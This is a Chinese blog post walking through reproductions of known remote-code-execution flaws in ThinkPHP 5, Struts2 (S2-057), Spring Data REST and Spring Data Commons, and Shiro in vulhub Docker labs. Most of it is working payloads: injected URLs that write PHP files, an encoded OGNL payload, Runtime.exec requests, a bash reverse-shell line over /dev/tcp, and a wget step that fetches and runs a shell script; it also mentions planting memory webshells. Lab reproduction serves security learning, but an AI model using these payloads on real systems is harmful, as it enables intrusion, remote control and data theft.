常见框架漏洞复现

已于 2024-08-08 10:25:13 修改
阅读量1.5k 收藏 12
点赞数 30
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2024-08-08 09:48:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86440467/article/details/140992143
版权

环境

使用Debian虚拟机,配置docker与docker-compose

apt install docker.io
apt install docker-compose

配置后下载vulhub靶场

git clone https://github.com/vulhub/vulhub.git

后发现,环境还是无法启动成功,重新打开终端输入docker hub加速服务

sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<EOF
{
    "registry-mirrors": [
        "https://docker.anyhub.us.kg",
        "https://dockerhub.icu",
        "https://docker.awsl9527.cn"
    ]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

如图成功后,启动容器 ,成功

若想更改端口,则vim docker-compose.yml进入更改

Thinkphp

进入vulhub/thinkphp/5-rce目录下,docker-compose up -d 启动环境,访问(默认端口8080)

方法一

拼接路径,查看用户

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

将system替换为phpinfo,whoami替换为-1,打开探针

拼接,生成木马获取shell(演示使用探针演示),文件在根目录下,访问

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

方法二

 利用工具获取shell,利用蓝鲸thinkphp工具扫描,发现存在漏洞

选择漏洞查看命令是否能执行(第一个与第三个不支持命令)

自己写入木马后,点击getshell后,使用蚁剑测试连接(默认的木马没连上)

struts2(Apache)

S2-057远程执行代码漏洞

进入vulhub/struts2/s2-057目录下,docker-compose up -d 启动环境,拼接/struts2-showcase访问

拼接访问/struts2-showcase/${(123+123)}/actionChain1.action

刷新后可以看到中间实在位置相加了,刷新页面抓包,发送到重放器

将register2改为actionChain1发送,查看响应为302

然后将数字位置改为如下,发送,出现root

%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

 进入vulhub/spring/CVE-2017-8046目录下,docker-compose up -d 启动环境,拼接路径/customers/1访问,刷新使用BP抓包

将抓包文件换为以下,更换为自己的ip与端口,放完包

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193

[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]

查看开启环境的机器,查看docker开启镜像id

docker ps

使用以下两条命令,发现success

docker exec -it c9a1b028f320 /bin/bash
ls /tmp

spring代码执行(CVE-2018-1273)

进入vulhub/spring/CVE-2018-1273目录下,docker-compose up -d 启动环境,拼接路径/users访问,随便输入用户名密码后使用BP抓包

 将下面替换为以下,在重放器发送,显示500,并且id显示created创建成功

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

如上一个CVE-2017-8046一样返回靶场查看,zcc文件已创建

物理机www下写下反弹shell脚本ip为监听机器ip,port为监听端口

bash -i >& /dev/tcp/ip/port 0>&1

将抓包中touch /tmp/zcc改为以下(写下脚本的目录),发送成功

/usr/bin/wget -qO /tmp/shell.sh http://ip/111.sh

查看靶场文件是否写入,写入成功

物理机使用工具开启端口监听

BP中再更改命令为打开文件(如下),还是touch /tmp/zcc位置,发送

/bin/bash /tmp/shell.sh

监听成功

Shiro

进入vulhub/shiro/CVE-2016-4437目录下,docker-compose up -d 启动环境,访问

先验证Shiro框架(Shiro框架特征:响应包中存在字段set-Cookie: rememberMe=deleteMe)

使用BP抓包,添加字段,在重放器发送,发现响应包中存在set-Cookie: rememberMe=deleteMe

Cookie: rememberMe=123

使用shiro反序列化工具,填入地址,点击检测当前密钥,发现存在shiro框架

点击爆破密钥,得到密钥

点击检测当前利用链,得到利用链(若未得到爆破利用链)

来到命令执行,输入whoami执行,得到用户名

来到内存马,生成木马(注意:密码为字母与数字),打开哥斯拉测试连接(将asp改为jsp),成功

此次漏洞复现完毕,欢迎指出错误和讨论

Jhin-Askeladd
关注
专栏目录
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 未授权访问漏洞复现
qq_51577576的博客
09-03 1530
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC未授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1332
CVE-2020-15257-host模式容器逃逸漏洞分析
docker逃逸漏洞复现
风雨来花满楼的博客
07-20 465
如何判断是否在docker工作环境下 docker环境下:ls -alh /.dockerenv , 非docker环境,没有这个.dockerenv文件的(定制化比较高的docker系统也可能没有这个文件) 查询系统进程的cgroup信息 cat /proc/1/cgroup CVE-2020-15257 容器逃逸漏洞利用 CVE-2020-15257的利用条件——net namespace(–net=host)与宿主机共享 以以下命令运行容器 docker run --rm --net=
docker逃逸漏洞复现(CVE-2019-5736)
热门推荐
网络安全。
01-29 1万+
0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736,漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x02 漏洞原理 漏洞点在于runC,RunC是一个容器运行时,最初是作为Docker的一部分开发的,后...
CVE Docker逃逸漏洞复现
最新发布
8888的博客
06-15 769
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
docker容器逃逸漏洞复现
温和的跳跃
01-23 314
今天研究这个,漏洞复现
框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring
xiaoheizi的博客
07-16 399
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。工具:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令,需要先对命令进行编码。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 665
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 828
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
漏洞复现】Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 891
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 5341
Docker未授权访问漏洞,docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
配置Docker,漏洞复现
weixin_68047790的博客
08-20 752
Docker的配置,漏洞复现
记一次docker逃逸漏洞复现
zkaqlaoniao的博客
10-07 210
公众号:掌控安全EDU 分享更多技术文章,欢迎关注一起探讨学习。
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 6704
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
docker 容器镜像删除
在路上
07-09 1917
1.停止所有的container,这样才能够删除其中的images:docker stop $(docker ps -a -q)如果想要删除所有container的话再加一个指令:docker rm $(docker ps -a -q)2.查看当前有些什么imagesdocker images3.删除images,通过image的id来指定删除谁docker rmi 想要删除untagged ima
docker搭建Apache漏洞环境并实现其中几个相关漏洞(centos kali)
weixin_74182283的博客
03-30 1309
Apache(音译为阿帕奇)是世界使用排名第一(应该已经被取代了)的Web服务器软件。它可以运行在几乎所有广泛使用的计算 机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它可以运行在几乎所有广泛使用的计算机平台上。Apache源于NCSA httpd服务器,经过多次修改,成为世界上最流行的Web服务器软件之一。Apache取 自“a patchy server”的读音,意思是充满补丁的服务器,因为它是自由软件,所以不断有人来为它开发 新的功能、新的特性、修改原来的缺陷。
漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)
做自己喜欢的事,并将其发挥到极致!
12-09 5303
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
CVE-2021-42342漏洞复现及docker环境搭建
axdnoob的博客
07-18 3015
CVE-2021-42342 漏洞复现
python 注入漏洞复现
07-27
对于 Python 的注入漏洞,一种常见的情况是 SQL 注入。SQL 注入是指攻击者通过在用户输入的数据中注入恶意的 SQL 语句,从而篡改数据库查询的行为。 下面是一个简单的 Python 代码示例,演示了 SQL 注入的复现过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值